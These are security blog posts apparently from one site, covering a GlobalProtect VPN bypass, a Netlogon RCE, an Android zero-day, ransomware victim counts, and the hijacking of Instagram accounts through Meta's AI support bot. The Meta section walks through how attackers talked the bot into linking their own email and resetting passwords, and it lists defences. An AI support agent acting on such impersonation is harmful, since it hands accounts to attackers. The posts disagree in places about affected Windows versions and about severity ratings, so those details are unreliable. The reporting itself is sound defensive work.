to your deployment. Workarounds and Mitigations If immediate patching is not possible, the following mitigations can reduce the risk of exploitation: Dedicated Certificate for Authentication Override Cookies: Generate a new, unique digital certificate specifically for encrypting and decrypting authentication override cookies. Ensure this dedicated certificate is stored securely and not reused for any other service, especially not for the GlobalProtect portal or gateway's HTTPS service. Strictly avoid sharing this certificate with other features or users within the network infrastructure. This separation prevents attackers from using an exposed HTTPS certificate to forge authentication cookies. Disable Authentication Override Entirely: Access the configuration settings for the GlobalProtect portal and gateway. Locate the "authentication override" feature options. Disable this feature completely by unchecking all options related to both the generation and acceptance of authentication override cookies. This removes the attack vector entirely, though it may require users to re-authenticate more frequently. Monitoring: Implement enhanced monitoring of GlobalProtect VPN authentication and session logs. Look for any anomalous login patterns, such as connections from unexpected geographical locations, unusual times, or unknown user accounts. Monitor for any suspicious activity originating from newly established VPN sessions, including attempts at lateral movement or access to sensitive internal resources. These steps, prioritized with patching, are important for securing Palo Alto Networks PAN-OS GlobalProtect deployments against CVE-2026-0257. Technical Takeaways CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS GlobalProtect VPN portal and gateway components. The vulnerability carries an initial CVSS 7.8 score, but its active exploitation and operational impact warrant attention from security teams. Exploitation uses a misconfiguration where the same certificate is used for both the GlobalProtect HTTPS service and authentication override cookie encryption. Attackers can forge authentication override cookies to gain unauthorized VPN access, potentially leading to internal network infiltration. Immediate remediation involves applying the vendor-supplied patch or implementing specific mitigations such as using a dedicated certificate for authentication override cookies or disabling the feature entirely. --- ## Pro-Iran Hackers Exploit Meta AI to Seize Instagram - URL: https://purple-ops.io/blog/pro-iran-hackers-meta-ai-instagram - Date: 2026-06-02 - Category: Threat Intelligence - Tags: none - Reading time: 11 min **Summary:** Pro-Iran hackers exploited Meta's AI support bot to compromise high-profile Instagram accounts, demonstrating a new social engineering vector. Pro-Iran Hackers Exploit Meta AI to Seize Instagram An attack targeting Meta's AI support assistant bot has enabled pro-Iran hackers to compromise several prominent Instagram accounts, including those associated with the Obama White House and the Chief Master Sergeant of the U.S. Space Force. The exploitation, which surfaced with instructions circulating on Telegram on May 31, 2026, allowed threat actors to bypass traditional security measures and execute unauthorized password resets and account takeovers. This incident shows a new area in social engineering, where artificial intelligence interfaces designed for user convenience become avenues for malicious activity. The method used a critical design flaw in Meta's AI chatbot, allowing attackers to trick the automated assistant into initiating account recovery procedures for unsuspecting targets. This led to the defacement of the high-profile accounts with pro-Iranian imagery and messages. This showed the potential for significant reputational damage and the ease with which AI systems can be manipulated when not adequately secured against social engineering tactics. Meta confirmed the issue and swiftly deployed an emergency patch to mitigate the vulnerability and secure affected accounts. This AI-based social engineering campaign is among several critical cybersecurity developments observed in the last 24 hours. Security agencies and researchers are dealing with active exploitation of a severe remote code execution flaw in Windows Netlogon, an authentication bypass in Palo Alto Networks GlobalProtect VPNs, and a zero-day vulnerability impacting the Android Framework. These incidents collectively show a dynamic threat environment characterized by innovative attack vectors and persistent targeting of foundational software and network infrastructure. How did threat actors trick Meta's AI assistant? Pro-Iran hackers successfully manipulated Meta's AI support assistant bot through a series of social engineering steps. Its design facilitated unauthorized account takeovers on Instagram. The method, widely shared and demonstrated in videos on Telegram channels, hinged on the bot's willingness to add a new email address to an existing account as part of its standard password reset workflow. This approach bypassed complex technical exploits by relying on the chatbot's conversational capabilities. The attack typically began with the actor using a Virtual Private Network (VPN) to establish a connection from an IP address geographically close to the target account's usual login location. This step aimed to make the subsequent password reset request appear more legitimate to automated security systems. Then, the attacker would initiate a password reset for the target Instagram account and select the option to engage with Meta's AI support assistant for assistance. The AI bot, designed to simplify account recovery, became an unwitting accomplice in the compromise. During the chat, the attacker would instruct the AI bot to link the target account to a new, attacker-controlled email address. The bot, seemingly programmed to assist with account access issues, would then send a one-time verification code to this newly linked email. With this code, the pro-Iran hackers could complete the password reset process, gaining full control of the Instagram account. Evidence of the successful attacks, including screenshots of defaced accounts featuring pro-Iran messages, was subsequently posted on Telegram, showing the exploit's effectiveness. Meta responded quickly to the emerging threat, deploying an emergency patch over the weekend of June 1, 2026, to address the vulnerability within its AI support system. Company spokesperson Andy Stone confirmed on X (formerly Twitter) that the issue had been resolved and that all impacted accounts were being secured. Cybersecurity analysis from TheCyberSecGuru.com indicated that no backend database breach occurred; the weakness was confined to the social engineering of the AI interface. Critically, accounts protected with multi-factor authentication (MFA)-even simple SMS-based codes-were largely impervious to this particular exploit. This shows MFA as a strong defense against such social engineering techniques. What is the impact of the actively exploited Windows Netlogon RCE? Threat actors are actively exploiting CVE-2026-41089, a critical stack-based buffer overflow vulnerability in Windows Netlogon, posing a significant risk of remote code execution (RCE) on targeted domain controllers. The Centre for Cybersecurity Belgium (CCB) issued a warning on June 1, 2026, confirming the active exploitation in the wild, urging immediate patching of affected servers. This vulnerability, which carries a CVSS 9.8 score, allows unprivileged attackers to execute code on sensitive Windows Server systems without requiring prior authentication or user interaction. The Netlogon service, a core component of Microsoft Windows Server, is responsible for authenticating users and services across Windows domain-based networks. Its critical role means a compromise can grant attackers deep access and control over an entire network infrastructure. All currently supported Windows Server versions, including Windows Server 2025, are susceptible to CVE-2026-41089. Microsoft initially patched this flaw during its May 2026 Patch Tuesday, describing the attack vector as a specially crafted network request that causes improper handling by the Netlogon service, leading to arbitrary code execution. This particular vulnerability was discovered by Windows Attack Research & Protection (WARP), an internal offensive cybersecurity and engineering research team at Microsoft. The urgency communicated by the CCB emphasizes the direct and severe threat this RCE poses to organizations globally. Active exploitation of such a fundamental service shows the persistent targeting of core enterprise components. Addressing critical Netlogon RCE vulnerabilities is important for maintaining network integrity, as detailed in discussions around Netlogon RCE CVE-2026-41089 and other Windows Server RCE vulnerabilities. While specific threat actors exploiting CVE-2026-41089 have not been publicly identified by Microsoft or the CCB, the widespread nature of Windows Server deployments means a broad range of entities could be at risk. The successful exploitation enables attackers to gain system-level privileges on domain controllers, potentially leading to full network compromise, data exfiltration, or the deployment of ransomware. Organizations must prioritize applying the May 2026 security updates to prevent attackers from using this critical flaw. How are attackers bypassing authentication in Palo Alto GlobalProtect VPNs? Attackers are actively exploiting CVE-2026-0257, an authentication bypass vulnerability within Palo Alto Networks' PAN-OS GlobalProtect VPN technology, to gain unauthorized network access. This flaw allows adversaries to bypass authentication mechanisms and establish VPN connections without valid credentials, enabling them to impersonate legitimate users and potentially access internal network resources. Rapid7 observed successful exploitation "across numerous customers" as early as May 17, 2026, prompting the Cybersecurity and Infrastructure Security Agency (CISA) to add this flaw to its Known Exploited Vulnerabilities (KEV) catalog on May 29. The vulnerability affects the GlobalProtect portal and gateway components of PAN-OS software across various versions. Exploitation requires specific configuration conditions: firewalls must have both authentication override cookies enabled and a particular certificate setup. Specifically, the flaw becomes exploitable if the certificate used to encrypt and decrypt authentication override cookies is the same certificate used for the GlobalProtect portal or gateway's HTTPS service. While Palo Alto Networks initially assigned a CVSS score of 7.8, Rapid7 researchers have urged organizations to treat it as a critical vulnerability due to its active exploitation and the significant impact an authentication bypass on an edge-facing VPN appliance can have. Rapid7's analysis detailed the exploitation mechanism, observing two distinct waves of attack activity. Initially, attackers utilized forged authentication cookies to impersonate legitimate users and authenticate to vulnerable GlobalProtect gateways. A second wave of activity on May 21 showed evidence of attackers being assigned VPN addresses and subsequently gaining access to internal networks. This occurs because, under certain configurations, the system trusts decrypted cookies without verifying their authenticity. If administrators reuse the same certificate for both HTTPS services and cookie encryption, attackers can obtain the certificate's public key, generate forged cookies, and the VPN gateway will accept them as valid. To mitigate CVE-2026-0257, Palo Alto Networks has released patches, and immediate application is strongly advised. If patching is not feasible, organizations should implement alternative mitigations. This includes using a dedicated, securely stored certificate exclusively for authentication override cookies, ensuring it is not reused for other features or shared. Disabling the authentication override feature entirely by unchecking all related options in the GlobalProtect portal and gateway configuration is another recommended measure to prevent exploitation. Which Android zero-day is under targeted exploitation? A critical zero-day flaw, identified as CVE-2025-48595, within the core Android Framework component is currently under limited, targeted exploitation by cybercriminals. Google confirmed the active exploitation as part of its June 2026 security bulletin, urging users and administrators to apply the latest patches without delay. This vulnerability, stemming from a dangerous memory management error-specifically an integer overflow-poses a severe risk, potentially allowing threat actors to achieve code execution and gain full control over compromised mobile devices. The flaw's presence in the Android Framework makes it particularly concerning, as this core component underpins the operating system's functionality across a vast ecosystem of devices. Successful exploitation of CVE-2025-48595 requires no user interaction, making it a "zero-interaction" vulnerability and increasing the urgency of applying security updates. The full June 2026 security bulletin from Google addresses a total of 113 vulnerabilities across multiple software layers, with 18 critical flaws patched that could otherwise lead to complete device takeover. Beyond the Android Framework, the June 2026 security update also includes vital patches for subcomponents from key hardware vendors such as Qualcomm, MediaTek, and Unisoc. This broad coverage aims to secure the diverse Android ecosystem against a wide array of threats. For users, devices running Android system version 10 or later are configured to automatically receive updates via Google Play services. However, manual verification of the patch level is essential to confirm remediation. To ensure protection against this zero-day and other documented threats, Android devices must have patch levels dated June 5, 2026, or later. Maintaining strict patch hygiene is a crucial defense against advanced mobile threat groups and the continuous emergence of new vulnerabilities. The limited, targeted nature of the current exploitation does not diminish the potential for wider campaigns, which shows the need for immediate action across all Android deployments. Technical Takeaways The exploitation of Meta's AI support assistant demonstrates a significant shift in social engineering tactics, targeting AI interfaces as new attack surfaces for account compromise. The active exploitation of CVE-2026-41089, a critical RCE in Windows Netlogon, shows the ongoing and severe threat posed by vulnerabilities in core enterprise infrastructure components. Authentication bypass vulnerabilities, such as CVE-2026-0257 in Palo Alto Networks GlobalProtect VPNs, continue to be high-priority targets for threat actors seeking initial access to corporate networks. Zero-day flaws like CVE-2025-48595 in the Android Framework show the persistent risk of remote code execution on mobile devices, even when exploitation is initially limited and targeted. Strong multi-factor authentication (MFA) remains a fundamental security control, proving effective in preventing account takeover attacks even when novel AI-based social engineering techniques are employed. How the Meta AI Social Engineering Attack Worked The attack exploited a fundamental trust gap in Meta's AI support infrastructure. Threat actors crafted carefully worded requests to the AI chatbot, mimicking legitimate account recovery scenarios: Impersonation prompts convinced the bot the attacker was the account owner Automated password reset flows were triggered without secondary human verification Telegram-distributed scripts standardized the attack for wider replication The bot lacked behavioral anomaly detection for repeated recovery attempts This technique required no malware or phishing infrastructure — only conversational manipulation. See also: Social Engineering Attack Vectors Indicators of Compromise and Affected Targets Security researchers identified several patterns across compromised accounts that defenders should monitor: Sudden profile photo and bio changes to pro-Iranian imagery Unauthorized password reset emails sent to legitimate account owners Account activity originating from Middle Eastern IP ranges High-profile targets included government-adjacent and military-affiliated accounts The Obama White House account and U.S. Space Force Chief Master Sergeant profile were among confirmed victims. Organizations should audit admin account recovery settings immediately. See also: Instagram Account Security Best Practices Defensive Measures Against AI-Assisted Account Takeovers This incident highlights urgent gaps in how AI support tools handle sensitive account actions. Recommended mitigations include: Enforce hardware security keys (FIDO2) on high-value accounts Disable AI-initiated password resets for accounts with elevated privileges Require human-in-the-loop verification for recovery requests on flagged accounts Monitor for rapid successive AI chatbot interactions from single sessions Platforms should implement rate limiting and intent classification on support bots Users should review connected apps and active sessions immediately if suspicious recovery emails are received. See also: Multi-Factor Authentication Guide --- ## Palo Alto PAN-OS CVE-2026-0257 Bypass (CVSS 7.8) - URL: https://purple-ops.io/blog/palo-alto-pan-os-cve-2026 - Date: 2026-06-02 - Category: CVE Analysis - Tags: palo-alto, pan-os, cve-2026-0257, auth-bypass, globalprotect - Reading time: 5 min | CVSS: 7.8 **Summary:** Palo Alto Networks PAN-OS CVE-2026-0257 is an actively exploited authentication bypass (CVSS 7.8) allowing unauthorized VPN connections. Palo Alto PAN-OS CVE-2026-0257 Bypass (CVSS 7.8) Palo Alto Networks has acknowledged a critical authentication bypass vulnerability, identified as CVE-2026-0257, affecting its PAN-OS and Prisma Access products. This vulnerability, rated with a CVSS score of 7.8, allows unauthorized threat actors to establish Virtual Private Network (VPN) connections by circumventing standard authentication protocols. Although classified as a medium-severity flaw, a high CVSS score indicates a significant potential impact. The vulnerability is concerning due to its active exploitation. This active exploitation requires immediate attention from organizations utilizing affected configurations. The issue specifically targets firewalls with GlobalProtect portal or gateway configured under conditions where authentication override cookies are enabled and a particular certificate configuration is present. This document analyzes CVE-2026-0257, discussing its implications, exploitation specifics, affected products, detection methods, and remediation steps. Understanding the technical details of this flaw helps network defenders protect their infrastructure against ongoing threats. What is CVE-2026-0257 and why is it critical? CVE-2026-0257 is an authentication bypass vulnerability within Palo Alto Networks PAN-OS and Prisma Access that carries a CVSS score of 7.8. Despite being categorized as "medium-severity," this score typically places it within the "High" severity range, indicating a substantial risk. The vulnerability is critical because it permits unauthorized individuals to establish VPN connections to an organization's network, effectively circumventing the intended security perimeter. Active exploitation in the wild amplifies the criticality of CVE-2026-0257. Threat actors are using this flaw to gain unauthorized network access, posing a threat to the integrity and confidentiality of systems protected by affected Palo Alto Networks devices. An authentication bypass on a VPN gateway is severe, granting attackers direct entry into the internal network without valid credentials. This access can serve as a primary vector for reconnaissance, lateral movement, data exfiltration, and the deployment of additional malicious payloads. What is the potential impact of CVE-2026-0257? Unauthorized VPN connections to an organization's network are the primary impact of CVE-2026-0257. An attacker who successfully exploits this vulnerability can bypass the configured authentication mechanisms of PAN-OS GlobalProtect portal or gateway, gaining an unauthenticated entry point into the network. This effectively bridges the secure perimeter that VPNs are designed to enforce. Organizations using Palo Alto Networks firewalls with GlobalProtect portal or gateway configured are at risk, especially if authentication override cookies are enabled and a specific certificate configuration exists. VPN access compromise can lead to several severe consequences. Once inside the network, threat actors can conduct extensive reconnaissance, map network topology, identify valuable assets, and locate sensitive data. This initial access often precedes more sophisticated attacks, including privilege escalation, lateral movement to other systems, data exfiltration, or the deployment of ransomware and other destructive malware. Such unauthorized access directly threatens the confidentiality, integrity, and availability of network resources. How is CVE-2026-0257 exploited? This vulnerability is an authentication bypass. The attack vector specifically targets Palo Alto Networks firewalls configured with a GlobalProtect portal or gateway. Successful exploitation requires two key preconditions: authentication override cookies must be enabled, and a specific certificate configuration must be present on the affected firewall. Authentication override cookies are typically used for a smoother user experience, allowing subsequent connections to bypass re-authentication for a period. However, in this scenario, a flaw in how PAN-OS and Prisma Access handle these cookies, combined with certain certificate configurations, allows an unauthenticated attacker to manipulate the process. This manipulation enables the attacker to initiate a VPN connection as if they were a legitimate, authenticated user, bypassing established security controls and allowing adversaries to "set up VPN connections" without valid credentials. Palo Alto Networks confirmed CVE-2026-0257 is under active exploitation. Threat actors are actively using this vulnerability to gain unauthorized network access. This active exploitation shows organizations must address the vulnerability promptly. Further details on this issue are in our prior analysis of CVE-2026-0257. The rapid pace of exploit development, sometimes accelerated by advanced tooling, means the window between vulnerability disclosure and active exploitation shrinks. Our research on AI's role in accelerating exploit development discusses this trend. Which products are affected by CVE-2026-0257? The CVE-2026-0257 vulnerability affects specific products and configurations within the Palo Alto Networks ecosystem. Organizations relying on these products for VPN access control should review their deployments carefully. Affected products include: Palo Alto Networks PAN-OS: Specifically, firewalls running PAN-OS with a GlobalProtect portal or gateway configured are vulnerable. Enabled authentication override cookies and a specific certificate configuration are critical factors in the vulnerability's exploitability. Palo Alto Networks Prisma Access: This cloud-delivered security platform is also impacted by the same authentication bypass flaw when its GlobalProtect functionalities are configured under the specific conditions mentioned. The research indicates the vulnerability appears when a GlobalProtect portal or gateway is configured, authentication override cookies are enabled, and a specific certificate configuration exists. Since the research does not specify exact version numbers for affected PAN-OS or Prisma Access, all versions configured under these conditions should be considered potentially vulnerable until specific guidance from Palo Alto Networks states otherwise. Organizations must consult official Palo Alto Networks advisories for the precise scope of affected versions and any applicable patch information. What are the detection measures for CVE-2026-0257? Effective detection of CVE-2026-0257 exploitation depends on monitoring network and system logs for anomalous activity, particularly related to VPN connections and authentication processes. The research does not detail specific Indicators of Compromise (IOCs) like precise log signatures or EDR queries, but a proactive monitoring strategy can identify suspicious behavior that may signal compromise. Organizations should implement the following detection measures: Monitor VPN Connection Logs: Look for unexpected or unauthorized VPN connections to GlobalProtect portals or gateways. This includes connections originating from unusual geographical locations, IP addresses not associated with legitimate users, or at abnormal times. Track the number of failed authentication attempts followed by successful connections without a clear, legitimate reason. Focus on GlobalProtect session logs for any entries indicating successful connections where the expected authentication flow appears abnormal or incomplete. Review Authentication Logs: Scrutinize authentication logs for the GlobalProtect portal and gateway for any bypass events or successful authentications that do not correspond to known user activity. Monitor for the creation of VPN sessions without corresponding pre-authentication entries in logs. Certificate Configuration Monitoring: Regularly audit the certificate configurations on GlobalProtect interfaces. Any unauthorized changes or unusual activity related to certificate issuance, revocation, or usage should be investigated. Network Flow Analysis: Analyze network flow data (NetFlow, IPFIX, sFlow) for unusual traffic patterns originating from newly established VPN tunnels. This could include sudden spikes in data transfer, connections to internal assets not typically accessed by VPN users, or communication with known malicious external IP addresses. Security Information and Event Management (SIEM) Alerts: Configure SIEM systems to alert on the aforementioned anomalies. Establish baselines for normal VPN usage and flag deviations, especially those related to authentication events and source IP reputation. Continuous and vigilant monitoring is essential to detect and respond to potential compromises swiftly. What is the remediation guidance for CVE-2026-0257? Remediation for CVE-2026-0257 is crucial due to its active exploitation. The primary focus involves patching the vulnerability, or if a patch is not immediately available or deployable, implementing effective workarounds and mitigations. The following steps outline the remediation guidance: Apply Vendor Patches: Immediately consult official Palo Alto Networks security advisories and support channels for information regarding available patches for PAN-OS and Prisma Access. Apply all recommended security updates to all affected devices as soon as they are released and thoroughly tested in a staging environment. Given the active exploitation, patching should be prioritized over routine maintenance schedules. Implement Workarounds and Mitigations: Disable Authentication Override Cookies: If feasible and not critical for operational continuity, disable authentication override cookies on GlobalProtect portal and gateway configurations. This removes one of the key preconditions for CVE-2026-0257 exploitation. Review and Restrict Certificate Configurations: Carefully review the certificate configurations on GlobalProtect interfaces. Ensure that only necessary and properly configured certificates are in use and that they adhere to strong security practices. Remove any certificates that are not explicitly required. Enforce Strong Multi-Factor Authentication (MFA): While CVE-2026-0257 is an authentication bypass, strong MFA implementations can provide an additional layer of defense against follow-on attacks, even if the initial VPN connection is established. This ensures that even if an attacker gains unauthorized access, they still face hurdles in accessing internal resources that require MFA. Network Segmentation: Implement or strengthen network segmentation to limit the potential lateral movement of an attacker who manages to establish an unauthorized VPN connection. Isolate sensitive assets and restrict communication paths. Access Control Policies: Review and tighten access control policies for users connecting via GlobalProtect. Ensure that VPN users only have access to the resources absolutely necessary for their roles (least privilege principle). Enhance Monitoring: Continue to actively monitor VPN and authentication logs for any anomalous activity, as detailed in the detection section. Immediate alerting for suspicious connections can help in rapid incident response. Conduct regular security audits of GlobalProtect configurations to ensure compliance with best practices and the vendor's latest recommendations. Technical Takeaways CVE-2026-0257 is an actively exploited authentication bypass vulnerability affecting Palo Alto Networks PAN-OS and Prisma Access, specifically their GlobalProtect portal and gateway components. The vulnerability carries a CVSS score of 7.8, indicating a high potential impact despite being classified as medium-severity. Exploitation requires enabled authentication override cookies and a specific certificate configuration on the targeted firewalls. Successful exploitation grants unauthorized threat actors the ability to establish VPN connections, providing initial network access. Organizations must immediately apply available patches and implement mitigations like disabling authentication override cookies and reviewing certificate configurations if patching is not feasible. Continuous monitoring of VPN and authentication logs for anomalous connections is critical for early detection of exploitation attempts or successful breaches. --- ## Gentelman Ransomware Hits 14 Healthcare, Retail Victims - URL: https://purple-ops.io/blog/gentelman-ransomware-healthcare-retail - Date: 2026-06-01 - Category: Ransomware Report - Tags: none - Reading time: 5 min **Summary:** The Gentelman ransomware group claimed 14 new victims, predominantly impacting healthcare and retail sectors with active operations. The Gentelman Ransomware Claims 14 Healthcare, Retail Victims Statistical Overview Victim Totals This month: 27 This quarter: 1573 Year to date: 4198 Last 24h: 29 Quarterly Breakdown Q1: 2631 | Q2: 1573 | Q3: 0 | Q4: 0 Ransomware activity maintains a consistent volume, with 29 new victims reported in the last 24 hours. Quarterly data indicates substantial impact across global organizations, accumulating 1573 victims in Q2. Introduction In the last 24 hours, ransomware operators claimed 29 new victims across various sectors and geographies. The Gentelman group was active, accounting for 14 of these new compromises. Other groups included DragonForce, Abyss, INC Ransom, and Lapsus. Primary affected sectors observed include Healthcare, Retail & Ecommerce, Professional Services, and Government / Public Sector, with attacks concentrated in North America, including the United States and Canada. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1The Gentelman14Anandji haridas, Arabian procession holding, Bouri group (+11)Hong Kong, CanadaHealthcare, Retail & Ecommerce 2DragonForce3Panorama bpo, Synex international pvt ltd, Taos mountain casinoUnited States, PeruConstruction & Engineering, Professional Services 3Abyss2Landkreis-limburg-weilburg.de, School facility consultantsGermany, United StatesProfessional Services, Government / Public Sector 4INC Ransom2Bradley law firm, Champaign-Urbana Public Health DistrictUnited StatesHealthcare, Legal 5Lapsus2Mapfre assurance, MercorUnited States, SpainInsurance, Technology / Software 6Play News2Digitall graphics, Hightower communicationsUnited States, CanadaProfessional Services, Telecommunications 7AiLock1SchneebeliSwitzerlandManufacturing 8Brain Cipher1Squamish.netCanadaGovernment / Public Sector 9Bravox1Grupo mauáBrazilProfessional Services 10Kairos1MortensenlawofficesUnited StatesLegal Ransomware activity remains active, largely driven by The Gentelman, which claimed 14 victims, predominantly in Healthcare and Retail & Ecommerce across Hong Kong and Canada. Other groups such as DragonForce and Abyss also contributed to the victim count, targeting sectors like Professional Services and Government / Public Sector. INC Ransom impacted the Champaign-Urbana Public Health District in the United States. This shows the ongoing threat to critical public services. The geographic distribution shows a continued focus on North America, alongside incidents in Europe, South America, and Asia. Further insights into the activity of The Gentelman ransomware group are available in our dedicated analysis. Victim Distribution By Country United States: 11 Canada: 4 India: 2 Brazil: 2 Spain: 1 Thailand: 1 Switzerland: 1 Sri Lanka: 1 Saudi Arabia: 1 Portugal: 1 By Industry Legal Services: 2 Automotive Manufacturing: 2 Telecommunications: 2 Insurance: 1 Water Utility: 1 School Facility Planning and Consulting: 1 Public Health: 1 Law Practice: 1 Industrial Textile Manufacturing: 1 Healthcare: 1 The United States continues to be the primary target region, accounting for 11 out of 29 new victims, followed by Canada. Industry targeting is diverse. Legal Services and Automotive Manufacturing each saw multiple incidents, with Telecommunications also experiencing two, reflecting a broad opportunistic approach by ransomware groups. Ransomware News Topline VSP Solutions, an Australian video security distributor, is responding to a cyber security incident claimed by the Stormous ransomware-as-a-service group. Campaigns & Operations Stormous has reportedly exfiltrated and published over 40 GB of data from VSP Solutions, encompassing financial backups (QuickBooks & Reckon), email archives, staff personal folders, and customer databases. The company has engaged forensic experts, notified law enforcement and Australian government agencies, and is investigating the incident's scope. Stormous, known for its double-extortion tactics and data publication, continues to use compromised access against technology and business services globally. Vulnerabilities & TTPs The specific initial access vector for the VSP Solutions breach was not detailed. However, Stormous's operational methods consistently involve data exfiltration followed by publication if demands are unmet, employing double-extortion as a core tactic. Analyst Note This incident shows the persistent threat posed by established ransomware-as-a-service groups like Stormous, which continue to successfully compromise and extort organizations through data theft and publication. Technical Takeaways The Gentelman emerged as the most active ransomware group, responsible for nearly half of the new victims observed. Targeting remains globally diverse but shows a concentration in North America, with the United States and Canada experiencing a large volume of attacks. Healthcare, Retail & Ecommerce, Professional Services, and Government / Public Sector are among the top-affected sectors, indicating continued opportunistic targeting across various industries. Ransomware-as-a-service (RaaS) groups, exemplified by Stormous, continue to use double-extortion tactics involving data theft and publication to pressure victims. Critical infrastructure entities, such as public health districts, remain vulnerable to compromise by groups like INC Ransom. --- ## Netlogon RCE CVE-2026-41089 (CVSS 9.8) Actively Exploited - URL: https://purple-ops.io/blog/netlogon-rce-cve-2026-41089 - Date: 2026-06-01 - Category: CVE Analysis - Tags: netlogon, cve-2026-41089, rce, windows-server, actively-exploited - Reading time: 5 min | CVSS: 9.8 **Summary:** CVE-2026-41089, a critical Netlogon RCE with a CVSS 9.8, is actively exploited, allowing unauthenticated attackers SYSTEM privileges on Windows Server. Netlogon RCE CVE-2026-41089 (CVSS 9.8) Actively Exploited Microsoft's Netlogon service in Windows Server is affected by a critical Remote Code Execution (RCE) vulnerability, tracked as CVE-2026-41089. This flaw, with a CVSS score of 9.8, allows attackers to execute arbitrary malicious code with SYSTEM privileges on vulnerable domain controllers. Threat actors are actively exploiting CVE-2026-41089 in the wild, posing an immediate risk to corporate network infrastructure. The vulnerability enables an unauthenticated attacker to compromise domain controllers remotely without requiring user interaction. Successful exploitation grants complete control over affected enterprise identities and core authentication systems. Organizations must act immediately to mitigate the risk and prevent further compromise. Microsoft addressed CVE-2026-41089 as part of its May 2026 Patch Tuesday release, which included fixes for 118 vulnerabilities. This particular flaw is considered a significant threat to corporate networks among the patched vulnerabilities. Organizations must prioritize deploying these security updates to protect their environments. What is CVE-2026-41089 and why is it critical? CVE-2026-41089 is a critical Remote Code Execution (RCE) vulnerability in the Netlogon service of Microsoft Windows Server. This flaw is critical because of its CVSS score of 9.8 and its ability to enable unauthenticated attackers to achieve SYSTEM-level privileges on vulnerable domain controllers remotely. The vulnerability stems from improper handling of specially crafted network data packets by the Netlogon service. The criticality of CVE-2026-41089 is significant because it can fully compromise an organization's authentication infrastructure. An attacker who successfully exploits this vulnerability can gain complete administrative control over the domain controller, subsequently allowing control over all connected systems and user accounts within the domain. This level of access bypasses all typical security boundaries, giving adversaries an unfettered pathway to persistent network presence, data exfiltration, and widespread disruption. The absence of a requirement for user interaction or prior authorization also shows its severity, making it an attractive target for malicious campaigns. Impact An attacker exploiting CVE-2026-41089 can achieve Remote Code Execution (RCE) with SYSTEM privileges on the targeted Windows Server domain controller. This means they can execute any command or malicious payload on the compromised system as the highest-privileged user. The direct consequence is complete control over the domain controller itself. Organizations relying on Microsoft Windows Server for their authentication and directory services are at significant risk. Specifically, corporate networks with exposed domain controllers are vulnerable to this flaw. An attacker gaining SYSTEM privileges on a domain controller can effectively seize complete control of the entire corporate infrastructure. This includes managing user accounts, group policies, access to network resources, and potentially deploying ransomware or other destructive payloads across the entire domain. The real-world reach is widespread, affecting any enterprise environment operating unpatched Windows Server domain controllers. This malicious action requires zero user interaction and no prior authorization, allowing for complete system compromise, similar to the impact of some Windows kernel zero-day exploits. Exploitation Chain The exploitation of CVE-2026-41089 begins with an attacker sending a specially crafted network request to a vulnerable Windows Server domain controller. The vulnerability resides in the Netlogon service, which is responsible for user and machine authentication within a Windows domain. When the Netlogon service improperly handles this incoming data packet, it creates a condition that allows for Remote Code Execution. Preconditions for exploitation are minimal, primarily requiring network access to a susceptible Windows Server domain controller running the Netlogon service. Successful exploitation does not require any user interaction from the victim, nor does it necessitate prior authentication or authorization. This makes CVE-2026-41089 a zero-click, unauthenticated RCE vulnerability. The Centre for Cybersecurity Belgium (CCB) has confirmed that threat actors are actively executing this attack in the wild, indicating that public details and potentially Proof-of-Concept (PoC) exploits are available and used by malicious entities. The ability to gain SYSTEM privileges and control core authentication systems through a network service is a significant threat, similar to other critical operating system vulnerabilities, such as a Linux kernel local privilege escalation vulnerability. Affected Products and Versions The CVE-2026-41089 vulnerability affects specific versions of Microsoft Windows Server. All Windows Server versions from 2012 onwards that have not applied the May 2026 security updates are susceptible. The following Windows Server product lines and their respective versions are impacted: Microsoft Windows Server 2012 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2016 Microsoft Windows Server 2019 Microsoft Windows Server 2022 Organizations operating any of these Windows Server versions as domain controllers are advised to assess their patch status immediately. The vulnerability is present in the Netlogon service component, which is fundamental to the operation of these domain controller roles. Detection Detecting exploitation attempts or successful compromise related to CVE-2026-41089 requires monitoring network traffic and system logs, particularly those related to the Netlogon service. Detection guidance includes: Network Indicators: Monitor network traffic for unusual authentication requests targeting domain controllers, especially those utilizing the Netlogon Remote Protocol (MS-NRPC). Unusual traffic, such as a sudden increase in Netlogon authentication requests from unexpected source IPs or with abnormal parameters, may indicate an exploitation attempt. Look for deviations from baseline Netlogon communication behaviors, including attempts to establish insecure or null sessions if not typically observed in the environment. Observe outbound network connections from domain controllers that are not part of normal operational behavior. These could signify successful RCE and subsequent command-and-control (C2) communication. Log Signatures: Review Netlogon event logs for anomalies. Investigate event IDs related to Netlogon service activity, authentication failures, and changes in Netlogon secure channel status. While specific event IDs directly indicating CVE-2026-41089 exploitation may not be documented, any unusual or failed Netlogon negotiation attempts require investigation. Examine Windows Security Event Logs on domain controllers for suspicious activity following any observed unusual Netlogon traffic. This includes: Event ID 4624 (An account was successfully logged on): Look for successful logons using system or machine accounts from unusual source workstations or IP addresses that correspond to the timing of suspected exploitation. Event ID 4672 (Special privileges assigned to new logon): This event indicates administrative privileges being assigned, which could happen post-exploitation. Event ID 4663 (An attempt was made to access an object): Monitor for access attempts to sensitive objects or files that differ from normal administrative activities. Analyze System Event Logs for any unexpected service crashes or restarts of the Netlogon service, which could occur during an exploitation attempt. Monitor for the creation of new user accounts, changes to existing highly privileged accounts, or unexpected scheduled tasks, which are common post-exploitation activities. Organizations should implement strong logging and security information and event management (SIEM) solutions to centralize and analyze these logs effectively. Baselines of normal Netlogon activity and domain controller behavior are essential to identify anomalies. Remediation Immediate action is required to address CVE-2026-41089 because it is critical and actively exploited. Remediation steps include: Patch Deployment: Deploy the security updates released by Microsoft as part of the May 2026 Patch Tuesday. These fixes address the vulnerability in the Netlogon service. System administrators should apply these patches immediately to all affected Windows Server versions-including 2012, 2012 R2, 2016, 2019, and 2022-that function as domain controllers. Prioritize domain controllers and other critical servers in the patching schedule. Verify the patch installation to confirm the update was successfully applied. Network Isolation and Segmentation: Immediately isolate exposed domain controllers from untrusted networks. This protective measure restricts direct access to the Netlogon service from external or less secure network segments, limiting the potential attack surface. Implement strict network segmentation so only authorized systems and personnel can communicate with domain controllers over the necessary ports and protocols. Review firewall rules and access control lists (ACLs) to enforce this. Continuous Monitoring: After patching and isolation, maintain continuous monitoring of network traffic for unusual authentication requests and thoroughly review Netlogon logs for anomalies. This ongoing vigilance is important to confirm the effectiveness of remediation and to detect any lingering compromise or new exploitation attempts. Implement auditing for changes to privileged user accounts and groups, as well as modifications to domain 